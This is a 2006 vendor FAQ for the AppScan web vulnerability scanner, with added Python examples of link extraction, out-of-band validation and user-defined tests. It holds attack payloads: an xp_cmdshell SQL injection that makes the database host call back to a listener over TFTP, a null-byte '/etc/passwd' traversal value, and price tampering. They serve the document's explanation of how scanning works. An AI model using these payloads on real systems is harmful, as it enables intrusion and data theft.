Copyright 2006. Watchfire Corporation. All Rights Reserved.

AppScan Frequently Asked Technical Questions

1. How is AppScan different from other web application scanners?
2. How do I know if I've covered all of my applications?
3. How is AppScan different from code scanners?
4. Can AppScan test AJAX-based web applications?
5. Does AppScan extract links from JavaScripts and Flash files?
6. Can AppScan test SOAP web services for security issues?
7. How does AppScan update its database of attacks and attack techniques?
8. How many tests does AppScan's database contain?
9. Can I use AppScan on live production web applications, or will it damage/hurt the site?
10. Where does AppScan get its "Fix Recommendation" text from?
11. What kinds of web application technologies (e.g., ASP.NET, J2EE, PHP, etc.) does AppScan support?
12. Can I manually tamper with HTTP requests like I do with free tools like Paros, Burp-Proxy, and WebScarab? How different is AppScan from these free tools?
13. Is there a way for me to add my own tests to AppScan's database? Can I also write my own advisories?
14. If I have a Web Application Firewall installed, do I need to scan my application with AppScan?

1. Q: How is AppScan different from other web application scanners?

A: The main differentiators between AppScan and other scanners are:

a. Test Accuracy: the most important trait of a security scanner is its accuracy. Watchfire's patented AppScan software contains the industry's most advanced scanning engine. Accuracy is achieved in several ways, one of which is imitation of real-world hacker techniques. During the explore phase of a scan, AppScan collects information about parameters and uses it to tailor the tests it creates to your application. For example:

- AppScan will increase or decrease numeric values beyond their observed ranges (e.g., if a parameter called DocumentID was seen with values between 10 and 100, AppScan will attempt to send the values 9 and 101). This is a known web hacking technique that attempts to access resources without authorization.
- AppScan will attempt to manipulate select-parameter (pull-down menu) values outside their possible ranges.
- During a poison null byte attack, AppScan will use the original file extension (e.g., /etc/passwd%00.ext, where ext is the extension seen in the original parameter value) in order to bypass validation procedures that only check how the value ends.
- When attempting to manipulate a price parameter (for e-shoplifting attacks), AppScan keeps the original price format (e.g., if the original hidden price parameter value was $199.99USD, AppScan will change the amount but keep the format: $1.99USD).

AppScan is the only scanner to incorporate a "Port Listener" validation mechanism. The Port Listener enables AppScan to detect vulnerabilities such as SQL Injection with high certainty (where applicable) by using out-of-band communication. This validation mimics a known hacker technique: executing commands on the backend server. For example, when testing an application that uses an MS-SQL database for SQL Injection, AppScan will attempt to execute the XP_CMDSHELL stored procedure, which then issues a TFTP request back to AppScan. When the TFTP request reaches AppScan, the test is flagged as successful. Because this check executes a command on the database host, treat it as an invasive test and coordinate it with the site owner (see Question 9); it also requires that the database host can reach the scanning machine over UDP, so a filtered egress path produces a false negative rather than an error.

b. Scan Performance: customers have reported that in head-to-head comparisons AppScan's scanning speed is up to 5 times faster than competitive solutions.

c. Product Maturity: AppScan is currently the most mature web application scanner in the market (the first version of AppScan was released in 2000).

Gartner recently named Watchfire the worldwide market-share leader in the web vulnerability assessment market, with more than twice the market share of any competitor. IDC recently named Watchfire the worldwide market-share leader in the Web Application Security Assessment software category.

d. Actionable Results: AppScan's advisories contain both ASP.NET and J2EE source code examples, which help educate developers on how to solve complex security issues using best-practice methodologies. The Remediation View of the results enables AppScan users to communicate scan results to developers in an actionable, consolidated report. All fix recommendations are grouped by the problematic part of the application and by the code fix that is required, and are presented as a task list so that developers do not have to read through hundreds of pages of security reports.

2. Q: How do I know if I've covered all of my applications?

A: AppScan provides users with several indications of the areas and parts of the web application that were covered during a scan:

a. Application Tree: the Application Tree (in AppScan's user interface) is a graphical representation of the areas that were discovered and explored by AppScan. Users can validate that AppScan covered the whole application by viewing this tree and making sure that no application segments were left undiscovered.

b. Application Data: the Application Data view (accessed using the View Selector in AppScan's user interface) is a repository of information about the structure and contents of the application discovered during the explore phase. This data contains:

- Visited URLs: URLs that were visited during the explore phase
- Script Parameters: input parameters sent to the application, such as text fields, radio button values, hidden parameters, link parameters, etc.
- Interactive URLs: forms that were not automatically submitted and require user interaction

- Broken Links: links that AppScan could not retrieve (either because they are missing or because the application returned an error during the explore phase)
- Filtered URLs: URLs that were not explored because of explore filters (e.g., path exclusions, file type exclusions, depth limit, etc.)
- Comments: HTML comments extracted from each page discovered during the explore phase
- JavaScripts: JavaScript code extracted from each page discovered during the explore phase
- Cookies: HTTP cookies used during the explore phase (set either by a "Set-Cookie" header or by client-side code such as JavaScript)

Both the Application Tree and the Application Data view let users see whether AppScan covered all of the application during the scan. A practical check is to compare the Visited URLs and Script Parameters against the application's own site map or route list, and to work through the Interactive URLs and Filtered URLs by hand: anything that appears only in those two lists was not exercised automatically.

3. Q: How is AppScan different from code scanners?

A: Software can be tested for security issues at different stages of the application development lifecycle: you can analyze the source code (or compiled bytecode) without running it (static code analysis), you can instrument and observe the code while it runs (dynamic, or runtime, analysis), or you can test the application as a whole once it has been built and deployed (Blackbox scanning). Code scanners (Whitebox scanners) are tools that receive the software before it is built and deployed, and test it for functionality and security problems within the code. In general, there are two types of code analysis techniques:

- Static code analysis
- Dynamic (runtime) analysis

Static code analyzers that rely mainly on text pattern matching locate problems in the source code cheaply, but they are simplistic and prone to missing many issues, in part because they cannot follow the application's flow. Dynamic (runtime) analyzers are more complex and can find flaws that static analyzers cannot detect. Their main problem is that they are farther away from the actual code, so locating the specific line where the problem occurred is sometimes difficult.

AppScan, on the other hand, uses a Blackbox approach. It treats the application as a "Blackbox" and interacts with it the way a user (or a hacker) would: testing is done by manipulating the input sent to the application and analyzing the output in order to locate security or functionality issues. The biggest advantage of the Blackbox approach is accuracy. A vulnerability reported by AppScan was actually triggered against the running application, so it is reproducible rather than theoretical; in code scanning, not all reported issues can be exploited by users of the application, and some exist only in theory. In addition, because AppScan can run against the web application installed in its designated production environment, it can also detect vulnerabilities that are specific to that environment, such as:

- Known vulnerabilities in components such as web servers, application servers, XML or SOAP parsers, etc.
- Vulnerabilities caused by improper configuration and settings
- Vulnerabilities in the application's logic, which can only be detected by looking at the application as a whole while it is running

To sum up, AppScan and code scanners perform security testing in different layers, and they complement each other.

4. Q: Can AppScan test AJAX-based web applications?

A: Yes. AJAX only changes how the client assembles and sends requests; the server-side code behind those requests is still subject to all of the usual testing techniques (e.g., SQL Injection, XSS, Buffer Overflows, etc.). In addition, when crawling an AJAX-based web application automatically, AppScan executes the page's JavaScript code (assuming that JavaScript execution is enabled) and automatically sends the requests created by XMLHttpRequest objects. Finally, AppScan users who prefer to traverse the AJAX application manually can do so with AppScan's embedded browser, just as they would with a regular browser.

5. Q: Does AppScan extract links from JavaScripts and Flash files?

A: Yes. AppScan can extract links from JavaScript code in order to discover new areas of the site, using three different techniques:

- JavaScript Execution: AppScan executes JavaScript code and analyzes the results to collect links, including dynamic links that may not be discovered by parsing alone.
- Static JavaScript Code Analysis: AppScan statically parses JavaScript code, looking for new links.
- Flash File Link Extraction: AppScan parses Flash files, looking for new links.
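The static technique in the list above recovers only URLs that appear as literals in the script. The following Python is added here as an illustration of that limit and is not Watchfire's parser: it pulls URL-looking string literals and the URL argument of a few request idioms out of JavaScript source, and the sample script shows one endpoint that only JavaScript execution would find. The sample script, the base URL and the set of idioms it recognises (xhr.open, fetch, location.href) are this example's own assumptions.

```python
"""Static link extraction from JavaScript: recover string literals that look
like URLs and the URL argument of common request idioms.  Added example,
not AppScan's parser; the idioms and the sample script are assumptions."""
import re
from urllib.parse import urljoin, urlsplit

# A single- or double-quoted JS string literal (group 2 is the contents).
STRING_LITERAL = re.compile(r"""(["'])((?:\\.|(?!\1)[^\\\n])*)\1""")

# Literal contents that look like a URL: absolute http(s), root-relative,
# or a relative name with a web-ish extension (optionally with a query).
URL_LIKE = re.compile(
    r"""^(?:https?://[^\s"'<>]+|/[^\s"'<>]*"""
    r"""|[\w./-]+\.(?:html?|php|aspx?|jsp|do|cgi|js|xml|json)(?:\?[^\s"'<>]*)?)$""")

# The URL argument of xhr.open(method, url), fetch(url) and location[.href] = url.
# These idioms are assumed for the example; a real crawler keeps a longer list.
REQUEST_IDIOM = re.compile(
    r"""(?:\.open\s*\(\s*["'][A-Za-z]+["']\s*,\s*|fetch\s*\(\s*|location(?:\.href)?\s*=\s*)"""
    r"""(["'])((?:\\.|(?!\1)[^\\\n])*)\1""")

def extract_links(js_source, base_url, same_host_only=True):
    """Return sorted absolute URLs recoverable from js_source without running it."""
    found = set()
    for m in STRING_LITERAL.finditer(js_source):
        if URL_LIKE.match(m.group(2)):
            found.add(urljoin(base_url, m.group(2)))
    for m in REQUEST_IDIOM.finditer(js_source):
        found.add(urljoin(base_url, m.group(2)))   # method names never reach here
    if same_host_only:                              # keep the crawl on the target
        host = urlsplit(base_url).netloc
        found = {u for u in found if urlsplit(u).netloc == host}
    return sorted(found)

# Constructed sample script: two endpoints appear as literals, one is built
# from pieces at run time (only JavaScript execution would recover it), and
# one points at a third-party host that the crawler should not follow.
SAMPLE_JS = r"""
var api = "/api/v1/";
function load(id) {
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "/api/v1/doc?id=" + id, true);
  xhr.send();
}
document.getElementById("help").onclick = function () {
  window.location.href = "help.html";
};
var cdn = "https://cdn.example.net/lib.js";
var search = api + "search";
"""
BASE_URL = "https://app.example.com/app/index.html"

def demo():
    """Links the static pass recovers from SAMPLE_JS; /api/v1/search is missed."""
    return extract_links(SAMPLE_JS, BASE_URL)
```

The `/api/v1/doc?id=` result is a partial URL: the literal prefix is found but the concatenated `id` is not, which is exactly the case the JavaScript Execution technique exists for. Widening the regexes catches more literals but also more noise; the same-host filter keeps the crawler from wandering onto CDNs and third-party hosts.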
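Question 1's Port Listener is an instance of out-of-band validation: the injected payload carries a token the scanner issued, and the test is confirmed only when that token arrives at a listener the scanner controls. The Python below is the receiving half of that exchange, added here as an illustration and not Watchfire's implementation. The TFTP read-request framing follows RFC 1350; the payload builder, the per-test token scheme and the validator class are this example's assumptions.

```python
"""Out-of-band (OOB) validation in the style of the Port Listener described in
Question 1: one unguessable token per test variant, a UDP listener that parses
TFTP read requests, and a match only for a token that is still pending.
Added example; the framing is RFC 1350, everything else is assumed here."""
import secrets
import socket
import struct
import time

TFTP_RRQ = 1  # read-request opcode (RFC 1350)

def sql_payload(listener_ip, token):
    """Illustrative MS-SQL injection payload: xp_cmdshell runs the Windows
    tftp client, which fetches <token> from the listener over UDP/69."""
    return f"'; EXEC master..xp_cmdshell 'tftp -i {listener_ip} GET {token}'--"

def build_rrq(filename, mode="octet"):
    """The datagram the tftp client sends: opcode, filename NUL, mode NUL."""
    return struct.pack("!H", TFTP_RRQ) + filename.encode() + b"\x00" + mode.encode() + b"\x00"

def parse_rrq(datagram):
    """Return (filename, mode) for a well-formed RRQ, else None."""
    if len(datagram) < 4 or struct.unpack("!H", datagram[:2])[0] != TFTP_RRQ:
        return None
    fields = datagram[2:].split(b"\x00")
    if len(fields) < 3 or not fields[0] or not fields[1]:
        return None
    try:
        return fields[0].decode("ascii"), fields[1].decode("ascii").lower()
    except UnicodeDecodeError:
        return None

class OobValidator:
    """Issues tokens and correlates incoming callbacks with pending tests."""

    def __init__(self, ttl_seconds=300):
        self.ttl = ttl_seconds
        self.pending = {}    # token -> (test_id, expiry)
        self.confirmed = {}  # test_id -> (token, peer address)

    def issue_token(self, test_id):
        token = secrets.token_hex(8)  # 64 random bits: no collisions, no guessing
        self.pending[token] = (test_id, time.monotonic() + self.ttl)
        return token

    def handle_datagram(self, datagram, peer):
        """Return the confirmed test_id; None for junk, unknown, replayed or expired tokens."""
        parsed = parse_rrq(datagram)
        if parsed is None:
            return None
        entry = self.pending.pop(parsed[0], None)   # a token is accepted once
        if entry is None or entry[1] < time.monotonic():
            return None
        self.confirmed[entry[0]] = (parsed[0], peer)
        return entry[0]

def serve(validator, bind=("0.0.0.0", 69), timeout=30.0):
    """Listen until every pending token is consumed or the timeout passes.
    Port 69 needs privileges; the Windows tftp client cannot be told another port."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(bind)
    sock.settimeout(1.0)
    deadline = time.monotonic() + timeout
    try:
        while validator.pending and time.monotonic() < deadline:
            try:
                datagram, peer = sock.recvfrom(512)
            except socket.timeout:
                continue
            validator.handle_datagram(datagram, peer)
    finally:
        sock.close()
    return validator.confirmed

def demo():
    """Offline walk-through with constructed datagrams instead of a live socket."""
    v = OobValidator()
    token = v.issue_token("sqli:/search.asp:q:variant7")
    hit = v.handle_datagram(build_rrq(token), ("10.0.0.5", 1045))
    replay = v.handle_datagram(build_rrq(token), ("10.0.0.5", 1046))
    wrong = v.handle_datagram(build_rrq("0123456789abcdef"), ("10.0.0.5", 1047))
    junk = v.handle_datagram(b"\x00\x05not a read request", ("10.0.0.5", 1048))
    return hit, replay, wrong, junk
```

The token, not the source address, is what ties a callback to a test: the request may arrive from a NAT address or a different host than the one injected into, so matching on the peer would fail, while matching on an issued-once, 64-bit token cannot be spoofed by a third party who merely observes scanning traffic. A callback that never arrives is a non-result, not a pass: with egress filtering in place the vulnerability may still exist.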

6. Q: Can AppScan test SOAP web services for security issues?

A: Yes. AppScan v7.0 enables users to perform Web Services scanning using the Web Services Explorer, a graphical utility that invokes Web Services and lets users interact with them. The Web Services Explorer reads your Web Service's WSDL file and displays the individual services and methods available in a simple tree format, enabling you to input parameters and view the responses. It can do this either as a standalone program or in conjunction with AppScan, using AppScan as its proxy. The second option enables AppScan to create tests for the service based on your input. In addition, AppScan's test database contains many tests for SOAP web services. The tests can be divided into three main groups:

a. Tests for SOAP/XML parsers: tests that attack the SOAP or XML parser component
b. Application-layer tests: these are similar to regular web application tests, such as SQL Injection, XSS, Buffer Overflows, etc.
c. Known vulnerabilities: known problems related to Web Services technologies

7. Q: How does AppScan update its database of attacks and attack techniques?

A: AppScan's database of attacks and attack techniques is updated through the "Live Update" feature. You can choose to receive updates whenever AppScan is launched ("Check for updates on startup" in AppScan's options) or by pressing the "Check for updates" button. Once the update process ends, the updates are installed in AppScan automatically, and information about the specific update appears in the "Updates log" (Help > Updates Log). New updates are available several times a week. Special updates are provided when needed (e.g., on discovery of critical vulnerabilities).

8. Q: How many tests does AppScan's database contain?

A: AppScan's database contains thousands of tests, covering all categories of the WASC (Web Application Security Consortium) Threat Classification. Since updates are issued several times a week, the exact number of tests changes rapidly. New attacks are added by:

a. Monitoring numerous web application security resources (newsgroups, mailing lists, etc.)

b. Monitoring hacker websites for new 0-day attacks
c. Proprietary research performed by Watchfire's Security Team

9. Q: Can I use AppScan on live production web applications, or will it damage/hurt the site?

A: Yes, you can use AppScan to test live production web applications, but several issues need to be taken into consideration when scanning such a site:

- Possible overloading of the web application. The application might not be able to handle the number of HTTP requests AppScan sends in such a short time.
- Your live production database may be filled with "non-real" information as a result of the automatic crawling and automatic form filling performed by AppScan.
- A large number of e-mails or other notifications may be sent to the administrator or site moderator as a result of the automatic crawling and automatic form filling performed by AppScan.

There are several actions you can take to reduce the impact on a live production web application:

a. Turn off the "Invasive" tests (Scan Configuration > Test Policy). Doing so ensures that no Denial of Service tests, or other tests that might cause the application or web server to crash (e.g., Buffer Overflows), are sent.

Important note: web applications often contain vulnerabilities that will only be discovered by AppScan's "Invasive" tests. Watchfire highly recommends that you test your application for these kinds of vulnerabilities, and that you do so in coordination with your site owner or administrator. You should also consider running these tests during off-peak hours, when the application is likely to be idle, and, where possible, against a staging copy of the application rather than the production instance.

b. Turn off the "Automatic Form Filler" (Scan Configuration > User Input). This ensures that AppScan does not fill in and submit forms automatically with information that might flood a database, bulletin board or online forum, or send e-mails to an administrator/moderator account.

Important note: turning the "Automatic Form Filler" off may limit AppScan's ability to reach certain areas of the site that are best reached by submitting forms. In this mode of operation, AppScan will only access areas of the site that can be reached by following links (with or without parameters).

c. Throttle AppScan's scan speed by reducing the number of threads used (Scan Configuration > Communication > Number of Threads).

10. Q: Where does AppScan get its "Fix Recommendation" text from?

A: The fix recommendations in AppScan are written as part of each test's advisory. Unlike other tools, AppScan's advisories are written in-house and are not copied as-is from public resources. Each test (and its fix recommendation(s)) that is added to AppScan is first researched by Watchfire's Security Team and validated before it is added to the next product update.

11. Q: What kinds of web application technologies (e.g., ASP.NET, J2EE, PHP, etc.) does AppScan support?

A: In general, since AppScan treats the web application as a "Blackbox" (see Question 3, "How is AppScan different from code scanners?"), it is usually technology-agnostic. AppScan interacts with the web application like a user would, without caring about the underlying programming language or application technology. In several cases, AppScan does attempt to detect the web technologies used by your application in order to modify and adapt specific tests so that they have a better chance of succeeding. For example, when trying to download system files, AppScan will attempt certain techniques for Windows-based applications and different techniques for UNIX-based (or other) systems. In addition, some of AppScan's "Infrastructure" tests (known vulnerabilities) are sent according to the underlying technology detected during the explore phase.

Note: users can choose to disable automatic server detection and launch all of the infrastructure tests regardless of AppScan's automatic detection (Scan Configuration > Application > Automatic Server Detection), but this is not recommended in most cases, as it may cause inaccuracies in the results. The case for doing it deliberately is a server that masks its identity (for example, a rewritten "Server" header behind a reverse proxy), where detection has little to go on.

12. Q: Can I manually tamper with HTTP requests like I do with free tools like Paros, Burp-Proxy, and WebScarab? How different is AppScan from these free tools?

A: Of course. You can manually tamper with any part of an HTTP request using AppScan's "Manual Test" utility. You can use this utility for:

a. Manipulating "valid" HTTP requests that were sent to the application during the explore phase. This is done by switching to the "Application Data" view, choosing a specific request in the Visited URLs, and then right-clicking on the URL and choosing "Manual Test" (or just by clicking the "Manual Test" button).

b. Manipulating test HTTP requests (creating your own "user defined" tests). This is done by switching to the "Issues" view, choosing a specific issue, drilling down to a specific test variant, and either right-clicking on the vulnerable element and choosing "Manual Test" or using the Tools > Manual Test menu.

AppScan's "Manual Test" utility has several important advantages over other HTTP testing tools:

a. AppScan automatically handles the application's login process for you. You do not have to log into the application in order to manually test parts of it that sit behind the login mechanism.
b. AppScan automatically handles SSL encryption for you, including the use of SSL client-side certificates.
c. AppScan automatically calculates the "Content-Length" HTTP header for you when applicable (e.g., when manipulating HTTP POST requests), so an edited body is never sent with a stale length.

In addition, if you still want to use an HTTP proxy for intercepting HTTP requests and responses, you can download and use "HTTP Proxy," one of Watchfire's free PowerTools.

13. Q: Is there a way for me to add my own tests to AppScan's database? Can I also write my own advisories?

A: Definitely. AppScan users can add their own tests using AppScan's "User Defined Tests" feature. This feature allows the addition of application-specific tests (e.g., parameter tampering tests), infrastructure tests (known vulnerabilities) or pattern-searching tests (e.g., locating certain text in all responses). New tests are added through a simple wizard, accessed through the Tools > User Defined Tests menu. For each new test that you add, you can also set its relevant information, such as:

- Test name
- Test advisory (impact, description, fix recommendation, etc.)
- Test severity level
- Test validation criteria (when the test is considered successful)

User Defined Tests persist across scans, and you can turn them on or off according to your needs.
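The parameter-aware mutations listed under Question 1 and the user-defined tests of Question 13 fit the same mould: a generator that turns the values observed during the explore phase into attack variants, and a validation criterion that decides whether a response means success. The Python below, an added example rather than AppScan's own test model, puts both together and runs four tests (three parameter-tampering, one pattern-search) against a constructed stub application that has the weaknesses Question 1 describes: an unchecked DocumentID, an extension check defeated by a null byte, and a client-supplied price. The test names, the stub application and its responses are assumptions made for the example.

```python
"""A minimal model of user-defined tests: a variant generator fed with the
values observed during the explore phase, plus a validation criterion.
Added example; the test model, generators and stub application are
constructed for illustration and are not AppScan's code."""
import re
from dataclasses import dataclass
from typing import Callable, Iterable, List, Tuple

@dataclass
class Observed:
    """A parameter and the values seen for it during the explore phase."""
    name: str
    values: List[str]

@dataclass
class UserDefinedTest:
    name: str
    severity: str
    variants: Callable[[Observed], Iterable[str]]   # values to send
    is_success: Callable[[str, str], bool]          # (variant, body) -> hit?

# --- variant generators: each tailors the attack to what was observed ---
def numeric_range_edges(p):
    """DocumentID seen as 10..100 -> try 9 and 101 (Question 1)."""
    nums = [int(v) for v in p.values if re.fullmatch(r"-?\d+", v)]
    if nums:
        yield str(min(nums) - 1)
        yield str(max(nums) + 1)

def null_byte_keep_extension(p):
    """report.pdf -> /etc/passwd%00.pdf, so a suffix check still passes."""
    for v in p.values:
        m = re.search(r"\.([A-Za-z]\w{0,4})$", v)
        if m:
            yield "/etc/passwd%00." + m.group(1)
            return

def keep_price_format(p):
    """$199.99USD -> $1.99USD: same currency markers, smaller amount."""
    for v in p.values:
        m = re.fullmatch(r"(\D+)?(\d+)(\.\d+)?(\D+)?", v)
        if m and (m.group(1) or m.group(4)):
            yield f"{m.group(1) or ''}1{m.group(3) or ''}{m.group(4) or ''}"
            return

def replay_observed(p):
    """No mutation: pattern-search tests only inspect ordinary responses."""
    yield from p.values

def body_matches(pattern):
    rx = re.compile(pattern, re.M)
    return lambda variant, body: rx.search(body) is not None

TESTS = [
    UserDefinedTest("Out-of-range DocumentID (unauthorized access)", "High",
                    numeric_range_edges, body_matches(r"Owner: (?!alice\b)")),
    UserDefinedTest("Poison null byte with original extension", "High",
                    null_byte_keep_extension, body_matches(r"^root:x:0:0:")),
    UserDefinedTest("Price tampering, format preserved", "Medium",
                    keep_price_format, lambda v, body: f"Total: {v}" in body),
    UserDefinedTest("Internal IP address in response", "Low",
                    replay_observed, body_matches(r"\b10\.\d+\.\d+\.\d+\b")),
]

# --- constructed stub of a vulnerable application (params -> response body) ---
def stub_app(params):
    if "DocumentID" in params:
        try:
            n = int(params["DocumentID"])
        except ValueError:
            return "400 Bad Request"
        if not 1 <= n <= 200:
            return "404 Not Found"
        owner = "alice" if 10 <= n <= 100 else "bob"   # ownership never checked
        return f"<!-- served by 10.1.2.3 --><h1>Doc {n}</h1><p>Owner: {owner}</p>"
    if "file" in params:
        if not params["file"].endswith(".pdf"):          # suffix check on the raw value...
            return "403 Forbidden"
        real = params["file"].replace("%00", "\x00").split("\x00")[0]  # ...then NUL truncation
        return "root:x:0:0:root:/root:/bin/bash" if real.endswith("/etc/passwd") else "%PDF-1.4"
    if "price" in params:
        return f"<p>Total: {params['price']}</p>"      # client-supplied price trusted
    return ""

def run_test(test, param, send) -> List[Tuple[str, str]]:
    """Send each variant in place of the observed value; return the hits."""
    return [(param.name, v) for v in test.variants(param)
            if test.is_success(v, send({param.name: v}))]

OBSERVED = [Observed("DocumentID", ["10", "42", "100"]),
            Observed("file", ["report.pdf"]),
            Observed("price", ["$199.99USD"])]

def scan(tests=TESTS, observed=OBSERVED, send=stub_app):
    """Run every test against every observed parameter (generators that do not
    apply yield nothing) and return {test name: (severity, hits)} for the hits."""
    report = {}
    for test in tests:
        hits = [h for p in observed for h in run_test(test, p, send)]
        if hits:
            report[test.name] = (test.severity, hits)
    return report
```

The validation criterion is where a user-defined test earns its keep: the out-of-range test is only a finding because the response shows another user's document, the price test only because the tampered total is echoed back as accepted, and a criterion that merely checks for a 200 status would flag both 404s and legitimate pages alike. The same structure extends to an infrastructure test (a fixed request path plus a version-string criterion) without changing the harness.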

14. Q: If I have a Web Application Firewall installed, do I need to scan my application with AppScan?

A: Achieving good security (physical, network and/or application) is all about adding layers of protection. There is no silver-bullet solution for security. Take network security as an example: everyone knows that you should not leave a server unpatched, even if it is behind a firewall, because if the firewall is not configured properly, or if someone manages to bypass it, the server is left totally exposed. Application security is not much different. You can scan the source code to make sure that the code is robust and does not contain low-level problems (such as buffer overflows); you can scan the web application using a Blackbox approach (using AppScan) to help ensure that problems such as SQL Injection, XSS, other kinds of parameter tampering and even logical flaws do not exist; and you can also use an application firewall to supply another layer of protection in front of the application. In addition, since application firewalls are complex pieces of software that require a lot of configuration, they are error-prone. Using AppScan together with a web application firewall provides assurance that the application firewall has been configured properly. To get both answers, scan twice: through the firewall, to learn what it blocks, and directly against the application (from an address the firewall does not front), to learn what is actually vulnerable behind it. A finding that disappears only in the first scan is a firewall rule, not a fix.

About Watchfire

Watchfire provides Online Risk Management software and services to help ensure the security and compliance of websites. More than 500 enterprises and government agencies, including AXA Financial, SunTrust, HSBC, Vodafone, Veterans Affairs and Dell, rely on Watchfire to audit and report on issues affecting their online business. Watchfire has received several industry honors, including the HP/IAPP Privacy Innovation Award, InfoSecurity Product Guide's Hot Security Company 2006, Computerworld's Innovative Technology Award, and a Recommended rating from Computer Reseller News. Watchfire was named by Gartner and IDC as the worldwide market-share leader in web application vulnerability assessment software. Watchfire's partners include IBM Global Services, Sapient, WebTrends, PricewaterhouseCoopers, Fortify, Microsoft, Interwoven, EMC Documentum and Mercury. Watchfire is headquartered in Waltham, MA. For more information, please visit Watchfire's website.


MatriXay WEB Application Vulnerability Scanner V 5.0. 1. Overview. (DAS- WEBScan ) - - - - - The best WEB application assessment tool MatriXay DAS-WEBScan MatriXay WEB Application Vulnerability Scanner V 5.0 (DAS- WEBScan ) - - - - - The best WEB application assessment tool 1. Overview MatriXay DAS- Webscan is a specific application

More information

Application Security Testing. Erez Metula (CISSP), Founder Application Security Expert ErezMetula@AppSec.co.il

Application Security Testing. Erez Metula (CISSP), Founder Application Security Expert ErezMetula@AppSec.co.il Application Security Testing Erez Metula (CISSP), Founder Application Security Expert ErezMetula@AppSec.co.il Agenda The most common security vulnerabilities you should test for Understanding the problems

More information

The purpose of this report is to educate our prospective clients about capabilities of Hackers Locked.

The purpose of this report is to educate our prospective clients about capabilities of Hackers Locked. This sample report is published with prior consent of our client in view of the fact that the current release of this web application is three major releases ahead in its life cycle. Issues pointed out

More information

QualysGuard WAS. Getting Started Guide Version 4.1. April 24, 2015

QualysGuard WAS. Getting Started Guide Version 4.1. April 24, 2015 QualysGuard WAS Getting Started Guide Version 4.1 April 24, 2015 Copyright 2011-2015 by Qualys, Inc. All Rights Reserved. Qualys, the Qualys logo and QualysGuard are registered trademarks of Qualys, Inc.

More information

Integrated Threat & Security Management.

Integrated Threat & Security Management. Integrated Threat & Security Management. SOLUTION OVERVIEW Vulnerability Assessment for Web Applications Fully Automated Web Crawling and Reporting Minimal Website Training or Learning Required Most Accurate

More information

Mingyu Web Application Firewall (DAS- WAF) - - - All transparent deployment for Web application gateway

Mingyu Web Application Firewall (DAS- WAF) - - - All transparent deployment for Web application gateway Mingyu Web Application Firewall (DAS- WAF) - - - All transparent deployment for Web application gateway All transparent deployment Full HTTPS site defense Prevention of OWASP top 10 Website Acceleration

More information

Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda

Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda 1. Introductions for new members (5 minutes) 2. Name of group 3. Current

More information

Application security testing: Protecting your application and data

Application security testing: Protecting your application and data E-Book Application security testing: Protecting your application and data Application security testing is critical in ensuring your data and application is safe from security attack. This ebook offers

More information

(WAPT) Web Application Penetration Testing

(WAPT) Web Application Penetration Testing (WAPT) Web Application Penetration Testing Module 0: Introduction 1. Introduction to the course. 2. How to get most out of the course 3. Resources you will need for the course 4. What is WAPT? Module 1:

More information

Passing PCI Compliance How to Address the Application Security Mandates

Passing PCI Compliance How to Address the Application Security Mandates Passing PCI Compliance How to Address the Application Security Mandates The Payment Card Industry Data Security Standards includes several requirements that mandate security at the application layer. These

More information

Bank Hacking Live! Ofer Maor CTO, Hacktics Ltd. ATC-4, 12 Jun 2006, 4:30PM

Bank Hacking Live! Ofer Maor CTO, Hacktics Ltd. ATC-4, 12 Jun 2006, 4:30PM Bank Hacking Live! Ofer Maor CTO, Hacktics Ltd. ATC-4, 12 Jun 2006, 4:30PM Agenda Introduction to Application Hacking Demonstration of Attack Tool Common Web Application Attacks Live Bank Hacking Demonstration

More information

Web application security: Testing for vulnerabilities

Web application security: Testing for vulnerabilities Web application security: Testing for vulnerabilities Using open source tools to test your site Jeff Orloff Technology Coordinator/Consultant Sequoia Media Services Inc. Skill Level: Intermediate Date:

More information

elearning for Secure Application Development

elearning for Secure Application Development elearning for Secure Application Development Curriculum Application Security Awareness Series 1-2 Secure Software Development Series 2-8 Secure Architectures and Threat Modeling Series 9 Application Security

More information

IBM Rational AppScan: enhancing Web application security and regulatory compliance.

IBM Rational AppScan: enhancing Web application security and regulatory compliance. Strategic protection for Web applications To support your business objectives IBM Rational AppScan: enhancing Web application security and regulatory compliance. Are untested Web applications putting your

More information

Application Security Testing

Application Security Testing Tstsec - Version: 1 09 July 2016 Application Security Testing Application Security Testing Tstsec - Version: 1 4 days Course Description: We are living in a world of data and communication, in which the

More information

Client vs. Server Implementations of Mitigating XSS Security Threats on Web Applications

Client vs. Server Implementations of Mitigating XSS Security Threats on Web Applications Journal of Basic and Applied Engineering Research pp. 50-54 Krishi Sanskriti Publications http://www.krishisanskriti.org/jbaer.html Client vs. Server Implementations of Mitigating XSS Security Threats

More information

Organizations Should Implement Web Application Security Scanning

Organizations Should Implement Web Application Security Scanning Research Publication Date: 21 September 2005 ID Number: G00130869 Organizations Should Implement Web Application Security Scanning Amrit T. Williams, Neil MacDonald Web applications are prone to vulnerabilities

More information

IBM Rational AppScan: Application security and risk management

IBM Rational AppScan: Application security and risk management IBM Software Security November 2011 IBM Rational AppScan: Application security and risk management Identify, prioritize, track and remediate critical security vulnerabilities and compliance demands 2 IBM

More information

DISCOVERY OF WEB-APPLICATION VULNERABILITIES USING FUZZING TECHNIQUES

DISCOVERY OF WEB-APPLICATION VULNERABILITIES USING FUZZING TECHNIQUES DISCOVERY OF WEB-APPLICATION VULNERABILITIES USING FUZZING TECHNIQUES By Michael Crouse Dr. Errin W. Fulp, Ph.D., Advisor Abstract The increasingly high volume of users on the web and their use of web

More information

Web Application Hacking (Penetration Testing) 5-day Hands-On Course

Web Application Hacking (Penetration Testing) 5-day Hands-On Course Web Application Hacking (Penetration Testing) 5-day Hands-On Course Web Application Hacking (Penetration Testing) 5-day Hands-On Course Course Description Our web sites are under attack on a daily basis

More information

Advanced Administration for Citrix NetScaler 9.0 Platinum Edition

Advanced Administration for Citrix NetScaler 9.0 Platinum Edition Advanced Administration for Citrix NetScaler 9.0 Platinum Edition Course Length: 5 Days Course Code: CNS-300 Course Description This course provides the foundation to manage, configure and monitor advanced

More information

Application Firewall Overview. Published: February 2007 For the latest information, please see http://www.microsoft.com/iag

